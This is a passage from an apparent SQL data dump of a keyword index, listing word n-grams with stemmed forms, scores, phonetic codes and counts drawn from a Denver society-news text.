in',0,1,1.4333,'C51535',1,'en'),(19673,'convention in lake','convent in lake',0,1,1.6,'C5153542',1,'en'),(19674,'courses with','cours with',0,1,1.4,'C623',1,'en'),(19675,'courses with grapes','cours with grapes',0,1,1.6333,'C6232612',1,'en'),(19676,'cover','cover',0,0,0.3333,'C160',1,'en'),(19677,'cover of','cover of',0,1,1.2667,'C161',1,'en'),(19678,'cover of the','cover of the',0,1,1.4,'C1613',1,'en'),(19679,'cu','cu',0,0,0.1333,'C000',1,'en'),(19680,'cu boulder','cu boulder',0,1,1.3333,'C1436',1,'en'),(19681,'cu boulder student','cu boulder student',0,1,1.6,'C14362353',1,'en'),(19682,'cunningham','cunningham',0,0,0.6667,'C525',1,'en'),(19683,'cunningham will','cunningham will',0,1,1.5,'C5254',1,'en'),(19684,'cunningham will be','cunningham will be',0,1,1.6,'C52541',1,'en'),(19685,'cut this','cut this',0,1,1.2667,'C320',1,'en'),(19686,'cut this past','cut this past',0,1,1.4333,'C32123',1,'en'),(19687,'cutest','cutest',0,0,0.4,'C323',1,'en'),(19688,'cutest all-vegetable','cutest all-vegetable',0,1,1.6667,'C323412314',1,'en'),(19689,'cutest all-vegetable alive','cutest all-vegetable alive',0,1,1.8667,'C3234123141',1,'en'),(19690,'day at','dai at',0,1,1.2,'D000',1,'en'),(19691,'day at challenges','dai at challenges',0,1,1.5667,'D2452',1,'en'),(19692,'defined','defin',0,0,0.4667,'D153',1,'en'),(19693,'defined meat','defin meat',0,1,1.4,'D15353',1,'en'),(19694,'defined meat is','defin meat is',0,1,1.5,'D153532',1,'en'),(19695,'denver','denver',0,0,0.4,'D516',1,'en'),(19696,'denver bold','denver bold',0,1,1.3667,'D516143',1,'en'),(19697,'denver bold names','denver bold names',0,1,1.5667,'D51614352',1,'en'),(19698,'denver colorado','denver colorado',0,1,1.5,'D5162463',1,'en'),(19699,'denver colorado i','denver colorado i',0,1,1.5667,'D5162463',1,'en'),(19700,'denver kid','denver kid',0,1,1.3333,'D51623',1,'en'),(19701,'denver kid of','denver kid of',0,1,1.4333,'D516231',1,'en'),(19702,'denver once','denver once',0,1,1.3667,'D51652',1,'en'),(19703,'denver once as','denver once as',0,1,1.4667,'D51652',1,'en'),(19704,'denver senior','denver senior',0,1,1.4333,'D516256',1,'en'),(19705,'denver senior options','denver senior options',0,1,1.7,'D5162561352',1,'en'),(19706,'denver since','denver since',0,1,1.4,'D516252',1,'en'),(19707,'denver since 1996','denver since 1996',0,1,1.5667,'D516252',1,'en'),(19708,'denver sister','denver sister',0,1,1.4333,'D516236',1,'en'),(19709,'denver sister cities','denver sister cities',0,1,1.6667,'D516236232',1,'en'),(19710,'denverites','denverit',0,0,0.6667,'D51632',1,'en'),(19711,'denverites who','denverit who',0,1,1.4667,'D51632',1,'en'),(19712,'denverites who had','denverit who had',0,1,1.6,'D516323',1,'en'),(19713,'diane','dian',0,0,0.3333,'D500',1,'en'),(19714,'diane at','dian at',0,1,1.2667,'D530',1,'en'),(19715,'diane at the','dian at the',0,1,1.4,'D530',1,'en'),(19716,'diners','diner',0,0,0.4,'D562',1,'en'),(19717,'diners were','diner were',0,1,1.3667,'D5626',1,'en'),(19718,'diners were blindfolded','diner were blindfolded',0,1,1.7667,'D56261453143',1,'en'),(19719,'dinner','dinner',0,0,0.4,'D560',1,'en'),(19720,'dinner city','dinner city',0,1,1.3667,'D5623',1,'en'),(19721,'dinner city internal','dinner city internal',0,1,1.6667,'D562353654',1,'en'),(19722,'dinner salman','dinner salman',0,1,1.4333,'D56245',1,'en'),(19723,'dinner salman rushdie','dinner salman rushdie',0,1,1.7,'D56245623',1,'en'),(19724,'dinner where','dinner where',0,1,1.4,'D560',1,'en'),(19725,'dinner where diners','dinner where diners',0,1,1.6333,'D563562',1,'en'),(19726,'displayed','displai',0,0,0.6,'D2143',1,'en'),(19727,'displayed in','displai in',0,1,1.4,'D21435',1,'en'),(19728,'displayed in the','displai in the',0,1,1.5333,'D214353',1,'en'),(19729,'disrobed','disrob',0,0,0.5333,'D2613',1,'en'),(19730,'disrobed that\'s','disrob that',0,1,1.5,'D26132',1,'en'),(19731,'disrobed that\'s how','disrob that how',0,1,1.6333,'D26132',1,'en'),(19732,'do a stroll','do a stroll',0,1,1.3667,'D2364',1,'en'),(19733,'do a walk','do a walk',0,1,1.3,'D420',1,'en'),(19734,'doorway','doorwai',0,0,0.4667,'D600',1,'en'),(19735,'doorway but','doorwai but',0,1,1.3667,'D613',1,'en'),(19736,'doorway but give','doorwai but give',0,1,1.5333,'D61321',1,'en'),(19737,'down to','down to',0,1,1.2333,'D530',1,'en'),(19738,'down to do','down to do',0,1,1.3333,'D530',1,'en'),(19739,'easily','easili',0,0,0.4,'E240',1,'en'),(19740,'easily 1','easili 1',0,1,1.2667,'E240',1,'en'),(19741,'easily 1 700','easili 1 700',0,1,1.4,'E240',1,'en'),(19742,'eat','eat',0,0,0.2,'E300',1,'en'),(19743,'eat animals','eat animals',0,1,1.3667,'E3542',1,'en'),(19744,'eat animals recently','eat animals recently',0,1,1.6667,'E354262534',1,'en'),(19745,'eating','eat',0,0,0.4,'E352',1,'en'),(19746,'eating out','eat out',0,1,1.3333,'E3523',1,'en'),(19747,'eating out for','eat out for',0,1,1.4667,'E352316',1,'en'),(19748,'ed','ed',0,0,0.1333,'E300',4,'en'),(19749,'ed sardella','ed sardella',0,1,1.3667,'E32634',1,'en'),(19750,'ed sardella and','ed sardella and',0,1,1.5,'E3263453',1,'en'),(19751,'elite','elit',0,0,0.3333,'E430',2,'en'),(19752,'elite jocks','elit jocks',0,1,1.3667,'E432',1,'en'),(19753,'elite jocks to','elit jocks to',0,1,1.4667,'E4323',1,'en'),(19754,'elway\'s','elwai',0,0,0.4667,'E420',1,'en'),(19755,'elway\'s summer','elwai summer',0,1,1.4667,'E4256',1,'en'),(19756,'elway\'s summer music','elwai summer music',0,1,1.6667,'E425652',1,'en'),(19757,'ends','end',0,0,0.2667,'E532',1,'en'),(19758,'ends aug.13','end aug.13',0,1,1.3667,'E532',1,'en'),(19759,'ends aug.13 with','end aug.13 with',0,1,1.5333,'E5323',1,'en'),(19760,'essential','essenti',0,0,0.6,'E2534',1,'en'),(19761,'essential dinner','essenti dinner',0,1,1.5333,'E2534356',1,'en'),(19762,'essential dinner salman','essenti dinner salman',0,1,1.7667,'E2534356245',1,'en'),(19763,'event','event',0,0,0.3333,'E153',4,'en'),(19764,'event the','event the',0,1,1.3,'E153',2,'en'),(19765,'event the bottles','event the bottles',0,1,1.5667,'E1531342',1,'en'),(19766,'exquisite','exquisit',0,0,0.6,'E230',1,'en'),(19767,'exquisite one','exquisit one',0,1,1.4333,'E235',1,'en'),(19768,'exquisite one must','exquisit one must',0,1,1.6,'E23523',1,'en'),(19769,'fahrenkrog','fahrenkrog',0,0,0.6667,'F65262',1,'en'),(19770,'fahrenkrog and','fahrenkrog and',0,1,1.4667,'F6526253',1,'en'),(19771,'fahrenkrog and ralph','fahrenkrog and ralph',0,1,1.6667,'F6526253641',1,'en'),(19772,'fahrenkrog is','fahrenkrog is',0,1,1.4333,'F65262',1,'en'),(19773,'fahrenkrog is the','fahrenkrog is the',0,1,1.5667,'F652623',1,'en'),(19774,'fair to','fair to',0,1,1.2333,'F630',1,'en'),(19775,'fair to eat','fair to eat',0,1,1.3667,'F630',1,'en'),(19776,'family home','famili home',0,1,1.3667,'F545',1,'en'),(19777,'family home hall','famili home hall',0,1,1.5333,'F5454',1,'en'),(19778,'feeling','feel',0,0,0.4667,'F452',2,'en'),(19779,'feeling that','feel that',0,1,1.4,'F4523',1,'en'),(19780,'feeling that puts','feel that puts',0,1,1.5667,'F4523132',1,'en'),(19781,'fla','fla',0,0,0.2,'F400',1,'en'),(19782,'fla she\'s','fla she',0,1,1.3,'F420',1,'en'),(19783,'fla she\'s won','fla she won',0,1,1.4333,'F425',1,'en'),(19784,'fledermaus','fledermau',0,0,0.6667,'F43652',1,'en'),(19785,'fledermaus i','fledermau i',0,1,1.4,'F43652',1,'en'),(19786,'fledermaus i think','fledermau i think',0,1,1.6,'F43652352',1,'en'),(19787,'flubbed','flub',0,0,0.4667,'F413',1,'en'),(19788,'flubbed the','flub the',0,1,1.3667,'F413',1,'en'),(19789,'flubbed the line','flub the line',0,1,1.5333,'F41345',1,'en'),(19790,'for life','for life',0,1,1.2667,'F641',2,'en'),(19791,'for life celebrity','for life celebrity',0,1,1.6,'F64124163',1,'en'),(19792,'for more','for more',0,1,1.2667,'F656',1,'en'),(19793,'for more and','for more and',0,1,1.4,'F65653',1,'en'),(19794,'for the aspen','for the aspen',0,1,1.4333,'F63215',1,'en'),(19795,'for travel','for travel',0,1,1.3333,'F63614',1,'en'),(19796,'for travel to','for travel to',0,1,1.4333,'F636143',1,'en'),(19797,'four courses','four courses',0,1,1.4,'F6262',1,'en'),(19798,'four courses with','four courses with',0,1,1.5667,'F62623',1,'en'),(19799,'frederick','frederick',0,0,0.6,'F6362',1,'en'),(19800,'frederick s','frederick s',0,1,1.3667,'F6362',1,'en'),(19801,'frederick s wilcox','frederick s wilcox',0,1,1.6,'F636242',1,'en'),(19802,'from all','from all',0,1,1.2667,'F654',1,'en'),(19803,'from all over','from all over',0,1,1.4333,'F65416',1,'en'),(19804,'from easily','from easily',0,1,1.3667,'F6524',1,'en'),(19805,'from easily 1','from easily 1',0,1,1.4333,'F6524',1,'en'),(19806,'from the','from the',0,1,1.2667,'F653',7,'en'),(19807,'from the world','from the world',0,1,1.4667,'F653643',1,'en'),(19808,'fsc','fsc',0,0,0.2,'F200',1,'en'),(19809,'gallery','galleri',0,0,0.4667,'G460',2,'en'),(19810,'gallery at','galleri at',0,1,1.3333,'G463',1,'en'),(19811,'gallery at 1617','galleri at 1617',0,1,1.5,'G463',1,'en'),(19812,'gamed','game',0,0,0.3333,'G530',1,'en'),(19813,'gamed a','game a',0,1,1.2333,'G530',1,'en'),(19814,'gamed a diane','game a diane',0,1,1.4333,'G535',1,'en'),(19815,'games cut','game cut',0,1,1.3,'G523',1,'en'),(19816,'games cut this','game cut this',0,1,1.4667,'G5232',1,'en'),(19817,'get naked','get naked',0,1,1.3,'G3523',1,'en'),(19818,'get naked no','get naked no',0,1,1.4,'G35235',1,'en'),(19819,'give','give',0,0,0.2667,'G100',3,'en'),(19820,'give up','give up',0,1,1.2333,'G100',1,'en'),(19821,'give up show','give up show',0,1,1.4,'G120',1,'en'),(19822,'go','go',1,0,0.0167,'G000',5,'en'),(19823,'go to','go to',0,1,1.1667,'G300',3,'en'),(19824,'go to william','go to william',0,1,1.4333,'G345',1,'en'),(19825,'goes','goe',0,0,0.2667,'G000',2,'en'),(19826,'goes with','goe with',0,1,1.3,'G300',1,'en'),(19827,'goes with ed','goe with ed',0,1,1.4,'G300',1,'en'),(19828,'gold','gold',0,0,0.2667,'G430',2,'en'),(19829,'gold in','gold in',0,1,1.2333,'G435',1,'en'),(19830,'gold in makeup','gold in makeup',0,1,1.4667,'G43521',1,'en'),(19831,'goose','goos',0,0,0.3333,'G000',1,'en'),(19832,'goose sorensen','goos sorensen',0,1,1.4667,'G6525',1,'en'),(19833,'goose sorensen at','goos sorensen at',0,1,1.5667,'G65253',1,'en'),(19834,'grapes','grape',0,0,0.4,'G612',1,'en'),(19835,'grapes from','grape from',0,1,1.3667,'G612165',1,'en'),(19836,'grapes from all','grape from all',0,1,1.5,'G6121654',1,'en'),(19837,'great','great',0,0,0.3333,'G630',5,'en'),(19838,'great and','great and',0,1,1.3,'G6353',1,'en'),(19839,'great and i','great and i',0,1,1.3667,'G6353',1,'en'),(19840,'great other','great other',0,1,1.3667,'G636',1,'en'),(19841,'great other denver','great other denver',0,1,1.6,'G6363516',1,'en'),(19842,'great place','great place',0,1,1.3667,'G63142',1,'en'),(19843,'great place to','great place to',0,1,1.4667,'G631423',1,'en'),(19844,'greatest','greatest',0,0,0.5333,'G6323',1,'en'),(19845,'greatest vegan','greatest vegan',0,1,1.4667,'G6323125',1,'en'),(19846,'greatest vegan in','greatest vegan in',0,1,1.5667,'G6323125',1,'en'),(19847,'gross','gross',0,0,0.3333,'G620',1,'en'),(19848,'gross and','gross and',0,1,1.3,'G6253',1,'en'),(19849,'gross and poor','gross and poor',0,1,1.4667,'G625316',1,'en'),(19850,'had a','had a',0,1,1.1667,'H300',2,'en'),(19851,'had a one','had a one',0,1,1.3,'H350',1,'en'),(19852,'had me','had me',0,1,1.2,'H350',1,'en'),(19853,'had me pushed','had me pushed',0,1,1.4333,'H35123',1,'en'),(19854,'hall','hall',0,0,0.2667,'H400',2,'en'),(19855,'hall that\'s','hall that',0,1,1.3667,'H432',1,'en'),(19856,'hall that\'s part','hall that part',0,1,1.5333,'H432163',1,'en'),(19857,'hamptons','hampton',0,0,0.5333,'H51352',2,'en'),(19858,'hamptons magazine','hampton magazine',0,1,1.5667,'H51352525',1,'en'),(19859,'hamptons magazine cu','hampton magazine cu',0,1,1.6667,'H513525252',1,'en'),(19860,'have a great','have a great',0,1,1.4,'H1263',1,'en'),(19861,'have been on','have been on',0,1,1.4,'H150',1,'en'),(19862,'have for','have for',0,1,1.2667,'H160',1,'en'),(19863,'have for travel','have for travel',0,1,1.5,'H163614',1,'en'),(19864,'he\'ll','he',0,0,0.3333,'H400',1,'en'),(19865,'he\'ll do','he do',0,1,1.2667,'H430',1,'en'),(19866,'he\'ll do a','he do a',0,1,1.3333,'H430',1,'en'),(19867,'heading','head',0,0,0.4667,'H352',1,'en'),(19868,'heading towards','head towards',0,1,1.5,'H3523632',1,'en'),(19869,'heading towards barth','head towards barth',0,1,1.7,'H3523632163',1,'en'),(19870,'her','her',0,0,0.2,'H600',8,'en'),(19871,'her bow','her bow',0,1,1.2333,'H610',1,'en'),(19872,'her bow with','her bow with',0,1,1.4,'H613',1,'en'),(19873,'her in','her in',0,1,1.2,'H650',1,'en'),(19874,'her in very','her in very',0,1,1.3667,'H6516',1,'en'),(19875,'her or','her or',0,1,1.2,'H600',1,'en'),(19876,'her or the','her or the',0,1,1.3333,'H630',1,'en'),(19877,'his olympic','hi olympic',0,1,1.3667,'H24512',1,'en'),(19878,'his olympic rasing','hi olympic rasing',0,1,1.6,'H245126252',1,'en'),(19879,'holly','holli',0,0,0.3333,'H400',1,'en'),(19880,'holly kylberg','holli kylberg',0,1,1.4333,'H424162',1,'en'),(19881,'holly kylberg internet','holli kylberg internet',0,1,1.7333,'H42416253653',1,'en'),(19882,'home','home',0,0,0.2667,'H500',3,'en'),(19883,'home hall','home hall',0,1,1.3,'H540',1,'en'),(19884,'home hall that\'s','home hall that',0,1,1.5333,'H5432',1,'en'),(19885,'home with','home with',0,1,1.3,'H530',1,'en'),(19886,'home with three','home with three',0,1,1.5,'H536',1,'en'),(19887,'honored','honor',0,0,0.4667,'H563',1,'en'),(19888,'honored at','honor at',0,1,1.3333,'H563',1,'en'),(19889,'honored at the','honor at the',0,1,1.4667,'H563',1,'en'),(19890,'hot','hot',0,0,0.2,'H300',1,'en'),(19891,'hot l','hot l',0,1,1.1667,'H340',1,'en'),(19892,'hot l denver','hot l denver',0,1,1.4,'H343516',1,'en'),(19893,'hotel','hotel',0,0,0.3333,'H340',1,'en'),(19894,'hotel and','hotel and',0,1,1.3,'H3453',1,'en'),(19895,'hotel and its','hotel and its',0,1,1.4333,'H34532',1,'en'),(19896,'hotel in','hotel in',0,1,1.2667,'H345',1,'en'),(19897,'hotel in john','hotel in john',0,1,1.4333,'H34525',1,'en'),(19898,'hotel july','hotel july',0,1,1.3333,'H3424',1,'en'),(19899,'hotel july 18','hotel july 18',0,1,1.4333,'H3424',1,'en'),(19900,'hotel the','hotel the',0,1,1.3,'H343',1,'en'),(19901,'hotel the lodo','hotel the lodo',0,1,1.4667,'H34343',1,'en'),(19902,'how','how',1,0,0.025,'H000',7,'en'),(19903,'how rioja','how rioja',0,1,1.3,'H620',1,'en'),(19904,'how rioja is','how rioja is',0,1,1.4,'H620',1,'en'),(19905,'i flubbed','i flubbed',0,1,1.3,'I1413',1,'en'),(19906,'i flubbed the','i flubbed the',0,1,1.4333,'I1413',1,'en'),(19907,'i gamed','i gamed',0,1,1.2333,'I253',1,'en'),(19908,'i gamed a','i gamed a',0,1,1.3,'I253',1,'en'),(19909,'i have been','i have been',0,1,1.3667,'I150',1,'en'),(19910,'i think i','i think i',0,1,1.3,'I352',1,'en'),(19911,'i was able','i was able',0,1,1.3333,'I214',1,'en'),(19912,'i was one','i was one',0,1,1.3,'I250',1,'en'),(19913,'i\'m','i',0,0,0.2,'I500',4,'en'),(19914,'i\'m down','i down',0,1,1.2667,'I535',1,'en'),(19915,'i\'m down to','i down to',0,1,1.3667,'I5353',1,'en'),(19916,'ie','ie',0,0,0.1333,'I000',1,'en'),(19917,'ie colorado\'s','ie colorado',0,1,1.4333,'I24632',1,'en'),(19918,'ie colorado\'s stop','ie colorado stop',0,1,1.6,'I2463231',1,'en'),(19919,'in a','in a',0,1,1.1333,'I500',5,'en'),(19920,'in a introduce','in a introduce',0,1,1.4667,'I53632',1,'en'),(19921,'in and','in and',0,1,1.2,'I530',1,'en'),(19922,'in and out','in and out',0,1,1.3333,'I530',1,'en'),(19923,'in denver','in denver',0,1,1.3,'I53516',1,'en'),(19924,'in denver once','in denver once',0,1,1.4667,'I5351652',1,'en'),(19925,'in denver since','in denver since',0,1,1.5,'I53516252',1,'en'),(19926,'in ie','in ie',0,1,1.1667,'I500',1,'en'),(19927,'in ie colorado\'s','in ie colorado',0,1,1.5333,'I524632',1,'en'),(19928,'in john','in john',0,1,1.2333,'I525',1,'en'),(19929,'in john ashton\'s','in john ashton',0,1,1.5333,'I5252352',1,'en'),(19930,'in knowledgeable','in knowledgeable',0,1,1.5333,'I52543214',1,'en'),(19931,'in knowledgeable balloons','in knowledgeable balloons',0,1,1.8333,'I525432141452',1,'en'),(19932,'in lake','in lake',0,1,1.2333,'I542',1,'en'),(19933,'in lake buena','in lake buena',0,1,1.4333,'I54215',1,'en'),(19934,'in makeup','in makeup',0,1,1.3,'I521',1,'en'),(19935,'in makeup and','in makeup and',0,1,1.4333,'I52153',1,'en'),(19936,'in many','in many',0,1,1.2333,'I500',2,'en'),(19937,'in many mags','in many mags',0,1,1.4,'I520',1,'en'),(19938,'in paradeability','in paradeability',0,1,1.5333,'I5163143',1,'en'),(19939,'in paradeability and','in paradeability and',0,1,1.6667,'I516314353',1,'en'),(19940,'in some','in some',0,1,1.2333,'I525',1,'en'),(19941,'in some print','in some print',0,1,1.4333,'I5251653',1,'en'),(19942,'in the coming','in the coming',0,1,1.4333,'I53252',1,'en'),(19943,'in the lobby','in the lobby',0,1,1.4,'I5341',1,'en'),(19944,'in the mean','in the mean',0,1,1.3667,'I535',1,'en'),(19945,'in the meat','in the meat',0,1,1.3667,'I5353',1,'en'),(19946,'in very','in very',0,1,1.2333,'I516',1,'en'),(19947,'in very comely','in very comely',0,1,1.4667,'I516254',1,'en'),(19948,'infused','infus',0,0,0.4667,'I5123',1,'en'),(19949,'infused mouth','infus mouth',0,1,1.4333,'I512353',1,'en'),(19950,'infused mouth watering','infus mouth watering',0,1,1.7333,'I512353652',1,'en'),(19951,'internal','intern',0,0,0.5333,'I53654',1,'en'),(19952,'internal go','intern go',0,1,1.3667,'I536542',1,'en'),(19953,'internal go to','intern go to',0,1,1.4667,'I5365423',1,'en'),(19954,'internet beat','internet beat',0,1,1.4333,'I5365313',1,'en'),(19955,'internet beat mezcal','internet beat mezcal',0,1,1.6667,'I5365313524',1,'en'),(19956,'introduce','introduc',0,0,0.6,'I53632',1,'en'),(19957,'introduce sun','introduc sun',0,1,1.4333,'I536325',1,'en'),(19958,'introduce sun defined','introduc sun defined',0,1,1.7,'I5363253153',1,'en'),(19959,'is accounts','is accounts',0,1,1.3667,'I2532',1,'en'),(19960,'is accounts receivable','is accounts receivable',0,1,1.7333,'I25326214',1,'en'),(19961,'is an','is an',0,1,1.1667,'I250',3,'en'),(19962,'is an ace','is an ace',0,1,1.3,'I252',1,'en'),(19963,'is gross','is gross',0,1,1.2667,'I262',1,'en'),(19964,'is gross and','is gross and',0,1,1.4,'I26253',1,'en'),(19965,'is perhaps','is perhaps',0,1,1.3333,'I21612',1,'en'),(19966,'is perhaps also','is perhaps also',0,1,1.5,'I2161242',1,'en'),(19967,'is pierre','is pierre',0,1,1.3,'I216',1,'en'),(19968,'is pierre wolfe','is pierre wolfe',0,1,1.5,'I21641',1,'en'),(19969,'is the denver','is the denver',0,1,1.4333,'I23516',1,'en'),(19970,'is the greatest','is the greatest',0,1,1.5,'I2326323',1,'en'),(19971,'it was great','it was great',0,1,1.4,'I3263',1,'en'),(19972,'it\'s fair','it fair',0,1,1.3,'I3216',1,'en'),(19973,'it\'s fair to','it fair to',0,1,1.4,'I32163',1,'en'),(19974,'its may','it may',0,1,1.2333,'I325',1,'en'),(19975,'its may 19','it may 19',0,1,1.3333,'I325',1,'en'),(19976,'its off','it off',0,1,1.2333,'I321',1,'en'),(19977,'its off the','it off the',0,1,1.3667,'I3213',1,'en'),(19978,'jocks','jock',0,0,0.3333,'J000',1,'en'),(19979,'jocks to','jock to',0,1,1.2667,'J300',1,'en'),(19980,'jocks to model','jock to model',0,1,1.4667,'J3534',1,'en'),(19981,'john','john',0,0,0.2667,'J500',3,'en'),(19982,'john ashton\'s','john ashton',0,1,1.4333,'J52352',1,'en'),(19983,'john ashton\'s legendary','john ashton legendary',0,1,1.7667,'J5235242536',1,'en'),(19984,'joy','joi',0,0,0.2,'J000',2,'en'),(19985,'joy fahrenkrog','joi fahrenkrog',0,1,1.4667,'J165262',1,'en'),(19986,'joy fahrenkrog is','joi fahrenkrog is',0,1,1.5667,'J165262',1,'en'),(19987,'joy is','joi is',0,1,1.2,'J000',1,'en'),(19988,'joy is an','joi is an',0,1,1.3,'J500',1,'en'),(19989,'judy','judi',0,0,0.2667,'J300',1,'en'),(19990,'judy fahrenkrog','judi fahrenkrog',0,1,1.5,'J3165262',1,'en'),(19991,'judy fahrenkrog and','judi fahrenkrog and',0,1,1.6333,'J316526253',1,'en'),(19992,'july','juli',0,0,0.2667,'J400',2,'en'),(19993,'july 18','juli 18',0,1,1.2333,'J400',1,'en'),(19994,'july 18 associated','juli 18 associated',0,1,1.6,'J423',1,'en'),(19995,'june','june',0,0,0.2667,'J500',2,'en'),(19996,'june 11','june 11',0,1,1.2333,'J500',1,'en'),(19997,'june 11 over','june 11 over',0,1,1.4,'J516',1,'en'),(19998,'june 22','june 22',0,1,1.2333,'J500',1,'en'),(19999,'june 22 26.may','june 22 26.may',0,1,1.4667,'J500',1,'en'),(20000,'just named','just named',0,1,1.3333,'J353',1,'en'),(20001,'just named peta\'s','just named peta',0,1,1.5667,'J353132',1,'en'),(20002,'kentwood','kentwood',0,0,0.5333,'K530',1,'en'),(20003,'kentwood city','kentwood city',0,1,1.4333,'K5323',1,'en'),(20004,'kentwood city realtor','kentwood city realtor',0,1,1.7,'K53236436',1,'en'),(20005,'kid','kid',0,0,0.2,'K300',1,'en'),(20006,'kid of','kid of',0,1,1.2,'K310',1,'en'),(20007,'kid of well','kid of well',0,1,1.3667,'K314',1,'en'),(20008,'kiely','kieli',0,0,0.3333,'K400',1,'en'),(20009,'kiely and','kieli and',0,1,1.3,'K453',1,'en'),(20010,'kiely and a','kieli and a',0,1,1.3667,'K453',1,'en'),(20011,'kleeman','kleeman',0,0,0.4667,'K450',1,'en'),(20012,'kleeman is','kleeman is',0,1,1.3333,'K452',1,'en'),(20013,'kleeman is perhaps','kleeman is perhaps',0,1,1.6,'K4521612',1,'en'),(20014,'knowledgeable','knowledg',0,0,0.8667,'K543214',1,'en'),(20015,'knowledgeable balloons','knowledg balloons',0,1,1.7333,'K5432141452',1,'en'),(20016,'knowledgeable balloons silver','knowledg balloons silver',0,1,1.9667,'K5432141452416',1,'en'),(20017,'known','known',0,0,0.3333,'K500',4,'en'),(20018,'known as','known as',0,1,1.2667,'K520',1,'en'),(20019,'known as skiddles','known as skiddles',0,1,1.5667,'K52342',1,'en'),(20020,'known kentwood','known kentwood',0,1,1.4667,'K5253',1,'en'),(20021,'known kentwood city','known kentwood city',0,1,1.6333,'K525323',1,'en'),(20022,'kylberg','kylberg',0,0,0.4667,'K4162',1,'en'),(20023,'kylberg internet','kylberg internet',0,1,1.5333,'K416253653',1,'en'),(20024,'kylberg internet beat','kylberg internet beat',0,1,1.7,'K41625365313',1,'en'),(20025,'l again','l again',0,1,1.2333,'L250',1,'en'),(20026,'l again heading','l again heading',0,1,1.5,'L25352',1,'en'),(20027,'l baltimore','l baltimore',0,1,1.3667,'L14356',1,'en'),(20028,'l baltimore the','l baltimore the',0,1,1.5,'L143563',1,'en'),(20029,'l denver','l denver',0,1,1.2667,'L3516',1,'en'),(20030,'l denver colorado','l denver colorado',0,1,1.5667,'L35162463',1,'en'),(20031,'l outline','l outline',0,1,1.3,'L345',1,'en'),(20032,'l outline the','l outline the',0,1,1.4333,'L3453',1,'en'),(20033,'lake','lake',0,0,0.2667,'L200',1,'en'),(20034,'lake buena','lake buena',0,1,1.3333,'L215',1,'en'),(20035,'lake buena vista','lake buena vista',0,1,1.5333,'L215123',1,'en'),(20036,'latest model','latest model',0,1,1.4,'L323534',1,'en'),(20037,'latest model feeling','latest model feeling',0,1,1.6667,'L3235341452',1,'en'),(20038,'lauren to','lauren to',0,1,1.3,'L653',1,'en'),(20039,'lauren to star','lauren to star',0,1,1.4667,'L653236',1,'en'),(20040,'lauren uk','lauren uk',0,1,1.3,'L652',3,'en'),(20041,'lauren uk http','lauren uk http',0,1,1.4667,'L65231',1,'en'),(20042,'lauren uk outlet','lauren uk outlet',0,1,1.5333,'L652343',1,'en'),(20043,'lauren who','lauren who',0,1,1.3333,'L650',1,'en'),(20044,'lauren who says','lauren who says',0,1,1.5,'L652',1,'en'),(20045,'lauren\'s','lauren',0,0,0.5333,'L652',1,'en'),(20046,'lauren\'s latest','lauren latest',0,1,1.5,'L6524323',1,'en'),(20047,'lauren\'s latest model','lauren latest model',0,1,1.7,'L6524323534',1,'en'),(20048,'lauren\'s the','lauren the',0,1,1.4,'L6523',1,'en'),(20049,'lauren\'s the ads','lauren the ads',0,1,1.5333,'L65232',1,'en'),(20050,'leave','leav',0,0,0.3333,'L100',3,'en'),(20051,'leave and','leav and',0,1,1.3,'L153',2,'en'),(20052,'leave and return','leav and return',0,1,1.5333,'L1536365',1,'en'),(20053,'legendary','legendari',0,0,0.6,'L2536',1,'en'),(20054,'legendary 1991','legendari 1991',0,1,1.4667,'L2536',1,'en'),(20055,'legendary 1991 output','legendari 1991 output',0,1,1.7,'L2536313',1,'en'),(20056,'leonard','leonard',0,0,0.4667,'L563',1,'en'),(20057,'leonard sun','leonard sun',0,1,1.3667,'L56325',1,'en'),(20058,'leonard sun was','leonard sun was',0,1,1.5,'L563252',1,'en'),(20059,'life celebrity','life celebrity',0,1,1.4667,'L124163',1,'en'),(20060,'life celebrity style','life celebrity style',0,1,1.6667,'L124163234',1,'en'),(20061,'line actor','line actor',0,1,1.3333,'L5236',1,'en'),(20062,'line actor pam','line actor pam',0,1,1.4667,'L523615',1,'en'),(20063,'line announcing','line announcing',0,1,1.5,'L5252',1,'en'),(20064,'line announcing the','line announcing the',0,1,1.6333,'L52523',1,'en'),(20065,'lit','lit',0,0,0.2,'L300',1,'en'),(20066,'lit competition','lit competition',0,1,1.5,'L325135',1,'en'),(20067,'lit competition june','lit competition june',0,1,1.6667,'L32513525',1,'en'),(20068,'lobby','lobbi',0,0,0.3333,'L100',1,'en'),(20069,'lobby as','lobbi as',0,1,1.2667,'L120',1,'en'),(20070,'lobby as the','lobbi as the',0,1,1.4,'L123',1,'en'),(20071,'lobby of','lobbi of',0,1,1.2667,'L100',1,'en'),(20072,'lobby of the','lobbi of the',0,1,1.4,'L130',1,'en'),(20073,'lodo','lodo',0,0,0.2667,'L300',1,'en'),(20074,'lodo family','lodo family',0,1,1.3667,'L3154',1,'en'),(20075,'lodo family home','lodo family home',0,1,1.5333,'L31545',1,'en'),(20076,'lowering','lower',0,0,0.5333,'L652',2,'en'),(20077,'lowering ceremony','lower ceremony',0,1,1.5667,'L65265',1,'en'),(20078,'lowering ceremony uniforms','lower ceremony uniforms',0,1,1.8667,'L652651652',1,'en'),(20079,'magazine cu','magazin cu',0,1,1.3667,'M252',1,'en'),(20080,'magazine cu boulder','magazin cu boulder',0,1,1.6333,'M2521436',1,'en'),(20081,'mags','mag',0,0,0.2667,'M200',1,'en'),(20082,'mags while','mag while',0,1,1.3333,'M240',1,'en'),(20083,'mags while the','mag while the',0,1,1.4667,'M243',1,'en'),(20084,'make ralph','make ralph',0,1,1.3333,'M2641',1,'en'),(20085,'make ralph lauren','make ralph lauren',0,1,1.5667,'M2641465',1,'en'),(20086,'makeup','makeup',0,0,0.4,'M210',1,'en'),(20087,'makeup and','makeup and',0,1,1.3333,'M2153',1,'en'),(20088,'makeup and armoire','makeup and armoire',0,1,1.6,'M2153656',1,'en'),(20089,'males','male',0,0,0.3333,'M420',2,'en'),(20090,'males nominees','male nominees',0,1,1.4667,'M4252',1,'en'),(20091,'males nominees and','male nominees and',0,1,1.6,'M425253',1,'en'),(20092,'many','mani',0,0,0.2667,'M000',6,'en'),(20093,'many mags','mani mags',0,1,1.3,'M200',1,'en'),(20094,'many mags while','mani mags while',0,1,1.5,'M240',1,'en'),(20095,'market in','market in',0,1,1.3,'M6235',1,'en'),(20096,'market in a','market in a',0,1,1.3667,'M6235',1,'en'),(20097,'matthews\'','matthew',0,0,0.6,'M320',1,'en'),(20098,'matthews\' new','matthew new',0,1,1.4333,'M325',1,'en'),(20099,'matthews\' new watercolors','matthew new watercolors',0,1,1.8333,'M325362462',1,'en'),(20100,'may 19','mai 